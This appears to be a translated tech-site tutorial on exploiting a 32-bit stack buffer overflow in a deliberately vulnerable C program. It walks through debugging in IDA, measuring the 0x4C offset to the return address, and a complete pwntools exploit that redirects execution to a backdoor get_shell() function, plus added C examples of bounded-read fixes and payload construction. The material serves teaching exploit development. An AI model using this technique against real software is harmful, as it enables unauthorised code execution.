2025-04-01 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/03 Report--
This article covers "how to understand the principle of stack overflow and how to write EXP". Many people run into exactly this problem when working through real cases, so the editor will walk you through how to handle it. Read carefully and you should get something out of it!
Code analysis with stack overflow
Anyone with a little C and assembly can follow this example; to put it bluntly, all you need is a pair of hands. Here is the C code used in the experiment, with comments explaining it:
```c
// stack_overflow.c
#include <stdio.h>
#include <stdlib.h>

// The vulnerable function
void stack_overflow() {
    char buf[64] = {0};
    scanf("%s", buf);          // reads the input into buf with no length limit
    printf("Hello %s\n", buf); // prints the contents of buf
}

// To make the experiment easier, leave a backdoor function
void get_shell() {
    system("/bin/sh");
}

// Program entry
int main(void) {
    stack_overflow();
    return 0;
}
```
To analyze: the overflow in the code above is in the `stack_overflow()` function. buf lives in that function's stack frame and is allocated 64 bytes, but `scanf("%s")` places no limit on the length of the input, so anything longer than 63 characters (plus the terminating NUL) is written past the end of buf.
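As an added example (not code from the original article), here is the article's unbounded read placed next to two bounded forms that fix it. The helpers take their input from a string through sscanf() so the behaviour can be checked without a terminal; the width rule is the same for scanf() on stdin. The function names (read_unbounded, read_bounded, read_line, bounded_len_for) and the constructed inputs are this example's own.

```c
/* Added example, not part of the original article: the vulnerable read beside
 * two hardened forms.  Names and sample inputs are invented for illustration. */
#include <stdio.h>
#include <string.h>

#define BUF_MAX 63                 /* characters the buffer can hold */
#define BUF_SZ  (BUF_MAX + 1)      /* plus the terminating NUL */
#define STR_(x) #x
#define STR(x)  STR_(x)            /* turns BUF_MAX into the literal "63" */

/* Mirrors the article's scanf("%s", buf): no field width, so input longer than
 * BUF_MAX characters runs past the end of buf.  Never use with untrusted input. */
size_t read_unbounded(const char *input, char buf[BUF_SZ]) {
    buf[0] = '\0';
    if (sscanf(input, "%s", buf) != 1) return 0;
    return strlen(buf);
}

/* Fix 1: a field width one less than the buffer size leaves room for the NUL.
 * The width is generated from BUF_MAX so it cannot drift from the buffer size.
 * Excess input is simply left unread instead of being written past buf. */
size_t read_bounded(const char *input, char buf[BUF_SZ]) {
    buf[0] = '\0';
    if (sscanf(input, "%" STR(BUF_MAX) "s", buf) != 1) return 0;
    return strlen(buf);
}

/* Fix 2, for line-oriented input: fgets() takes the buffer size explicitly and
 * never stores more than size-1 characters plus the NUL. */
size_t read_line(FILE *in, char buf[BUF_SZ]) {
    if (fgets(buf, BUF_SZ, in) == NULL) { buf[0] = '\0'; return 0; }
    buf[strcspn(buf, "\n")] = '\0';   /* drop the newline if the whole line fit */
    return strlen(buf);
}

/* Feed a constructed run of n 'A' characters through the bounded reader and
 * return how many landed in the 64-byte buffer: never more than BUF_MAX. */
size_t bounded_len_for(size_t n) {
    char input[512];
    char buf[BUF_SZ];
    if (n >= sizeof input) n = sizeof input - 1;
    memset(input, 'A', n);
    input[n] = '\0';
    return read_bounded(input, buf);
}

int main(void) {
    printf("200 'A's through read_bounded: %zu chars stored\n", bounded_len_for(200));
    printf("10 'A's through read_bounded:  %zu chars stored\n", bounded_len_for(10));
    return 0;
}
```

Calling read_unbounded() with the 200-character input is left out deliberately: that is the overflow the article exploits, and it is undefined behaviour rather than something to measure.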
How to stack overflow
Since this is about stack overflow, I assume you have some foundation, at least knowing what a stack is. The first thing to understand is why the stack exists at all, which goes back to the invention of the function; see the wiki article if you are interested. One use of the stack is to store a function's local variables, and the same stack holds the return address of the calling function, saved at the moment of the call. Because buf is a local variable in the frame and the saved return address sits at a higher address in that frame, writing past the end of buf eventually overwrites the return address, and when stack_overflow() returns, execution continues wherever the overwritten value points.
Debugging for the first time
Now that the code is written, compile and run it first. (The addresses that appear later, of the form 0x0804xxxx, show that this is a 32-bit, non-PIE binary without a stack canary; on a current distribution you would need `-m32 -fno-stack-protector -no-pie` to reproduce that layout.)
```
[root@localhost pwn]# gcc stack_overflow.c -o stack_overflow
[root@localhost pwn]# ./stack_overflow
stack_overflow
Hello stack_overflow
```
The result is simple: enter a string and it is echoed back. Now open IDA on the host, drag the compiled program into IDA, and set a breakpoint in stack_overflow.
Next, copy linux_server from the IDA installation directory to the CentOS machine and run it:
```
[root@localhost pwn]# ./linux_server
IDA Linux 32-bit remote debug server(ST) v1.22. Hex-Rays (c) 2004-2017
Listening on 0.0.0.0:23946...
```
In IDA, select "Debugger" -> "Select debugger", choose "Remote Linux debugger" and click "OK". Then open "Debugger" -> "Process options...", enter the CentOS machine's IP as Hostname, leave Port at the default 23946 and the other options at their defaults, and press "F9" to start debugging.
Step through until the program reaches the scanf call, then enter `AAAAAA` as input.
Here is the idea. The program does not check the input length, so what we need is to work out how many bytes separate buf from the saved return address, then place the backdoor's address at exactly that position. In the debugger the return address slot is at `0xBF8C17BC` and buf starts at `0xBF8C1770`; the difference is `0x4C`. The plan is therefore clear: send 0x4C filler characters, followed by the address of get_shell().
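As an added example (not code from the original article), the frame the article just measured, buf at 0xBF8C1770 and the saved return address 0x4C bytes above it, is modelled below as a plain struct. The code builds the same filler-plus-address payload the article sends, applies it the way the unbounded scanf("%s") would, and reads back what now sits in the return slot. It also handles the one failure mode a practitioner hits here: scanf("%s") stops at whitespace, so a target address containing a whitespace byte is rejected instead of being silently truncated. The struct layout, the 12-byte gap, the stand-in "legitimate" return value and all function names are assumptions made for this example.

```c
/* Added example, not part of the original article.  It models the measured
 * frame as a struct and checks the payload the way the exploit needs it to
 * behave.  Names, the gap contents and the stand-in return value are invented. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SZ     64
#define RET_OFFSET 0x4C          /* buf -> saved return address, as measured in IDA */
#define TARGET     0x0804848eu   /* get_shell() address used in the article's session */

/* Model of the vulnerable frame.  The 12 bytes between buf and the return slot
 * stand in for whatever the compiler placed there (saved ebp, alignment). */
struct frame {
    unsigned char buf[BUF_SZ];
    unsigned char gap[RET_OFFSET - BUF_SZ];
    uint32_t      ret;           /* saved return address, little-endian in memory */
};

/* Equivalent of pwntools p32(): 32-bit little-endian encoding. */
static void p32(uint32_t v, unsigned char out[4]) {
    out[0] = v & 0xff; out[1] = (v >> 8) & 0xff;
    out[2] = (v >> 16) & 0xff; out[3] = (v >> 24) & 0xff;
}

/* Build filler + address.  Returns the payload length, or 0 if the address
 * contains a byte that scanf("%s") treats as a delimiter (0x09-0x0d, 0x20):
 * the read would stop there and the return slot would be only partly written. */
size_t build_payload(unsigned char *out, size_t cap, size_t offset, uint32_t target) {
    unsigned char addr[4];
    if (cap < offset + 4) return 0;
    p32(target, addr);
    for (int i = 0; i < 4; i++)
        if (isspace(addr[i])) return 0;
    memset(out, 'A', offset);
    memcpy(out + offset, addr, 4);
    return offset + 4;
}

/* What scanf("%s", buf) does to the frame: copy bytes into buf with no bound,
 * running on through gap and into ret.  The clamp only keeps this model
 * memory-safe; the real program has no such check. */
void apply_payload(struct frame *f, const unsigned char *payload, size_t n) {
    if (n > sizeof *f) n = sizeof *f;
    memcpy((unsigned char *)f, payload, n);
}

/* Run the model end to end and return the value now in the return slot. */
uint32_t hijacked_return(size_t offset, uint32_t target) {
    struct frame f;
    unsigned char payload[256];
    memset(&f, 0, sizeof f);
    f.ret = 0x080484c0u;         /* stand-in for the legitimate return into main() */
    size_t n = build_payload(payload, sizeof payload, offset, target);
    if (n == 0) return f.ret;    /* payload rejected: frame left untouched */
    apply_payload(&f, payload, n);
    return f.ret;
}

int main(void) {
    printf("frame size 0x%zx, return slot now 0x%08x\n",
           sizeof(struct frame), (unsigned)hijacked_return(RET_OFFSET, TARGET));
    printf("address with a space byte: 0x%08x (rejected, slot unchanged)\n",
           (unsigned)hijacked_return(RET_OFFSET, 0x08040a20u));
    return 0;
}
```

The whitespace check is the part worth keeping in a real EXP: with scanf("%s") the filler and the address are one token, so any target whose little-endian bytes include 0x0a, 0x20 or another delimiter needs a different gadget or a different input path.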
The second debugging
This continues from the first debugging session; this time pwntools takes over the program's input and output. First, use socat on CentOS to expose the program's stdin and stdout on port 9999:
```
[root@localhost pwn]# socat tcp-listen:9999,reuseaddr,fork EXEC:./stack_overflow,pty,raw,echo=0
```
Then connect with pwntools:
```
➜ ~ python3
Python 3.7.4 (default, Sep  7 2019, 17:46:28)
[Clang 10.0.1 (clang-1001.0.46.4)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> io = remote('172.16.177.134', 9999)
[x] Opening connection to 172.16.177.134 on port 9999
[x] Opening connection to 172.16.177.134 on port 9999: Trying 172.16.177.134
[+] Opening connection to 172.16.177.134 on port 9999: Done
```
At this point the connection is up and a stack_overflow process is running. Back in IDA, set a breakpoint on the instruction right after the scanf call; then select "Debugger" -> "Attach to process...", pick the running stack_overflow, click "OK", and press "F9" to let the program run.
In Python, send the payload. Remember to send a newline afterwards, or use sendline(), which appends one for you:
```
>>> payload = b'A'*0x4c + p32(0x0804848e)
>>> io.send(payload)
>>> io.send(b'\n')
```
IDA then hits the breakpoint, and stepping on to the retn instruction shows that we are about to jump to get_shell().
I will not step through the rest one instruction at a time; interested readers can follow along themselves. Here I just press `F9`, then switch pwntools into interactive mode. To make it a bit more rewarding `:)`, I have put a flag.txt on the box:
```
>>> io.interactive()
[*] Switching to interactive mode
Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ls
flag.txt  linux_server  stack_overflow  stack_overflow.c
cat flag.txt
flag{Y0u_Win_by_ATL_TEAM}
```
The four bytes of the packed address follow the run of A's in the "Hello" line; they are not printable characters, so they do not show up cleanly in the terminal.
Remember to call io.close() at the end of every debugging run; otherwise socat leaves a stack_overflow process behind for each connection you opened.
EXP writing
To sum up, the EXP looks like this. The address passed to p32() is that of get_shell() in the binary you compiled, read from IDA's function list; note that it differs from the value used in the interactive session above, so do not copy either one blindly:
```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *

io = remote('172.16.177.134', 9999)
payload = b'A'*0x4C + p32(0x08048475)   # 0x4C filler bytes, then the address of get_shell()
io.sendline(payload)                     # sendline() appends the newline scanf("%s") needs
io.interactive()
io.close()
```
That is all for "how to understand the principle of stack overflow and how to write EXP". Thank you for reading.
© 2024 shulou.com SLNews company. All rights reserved.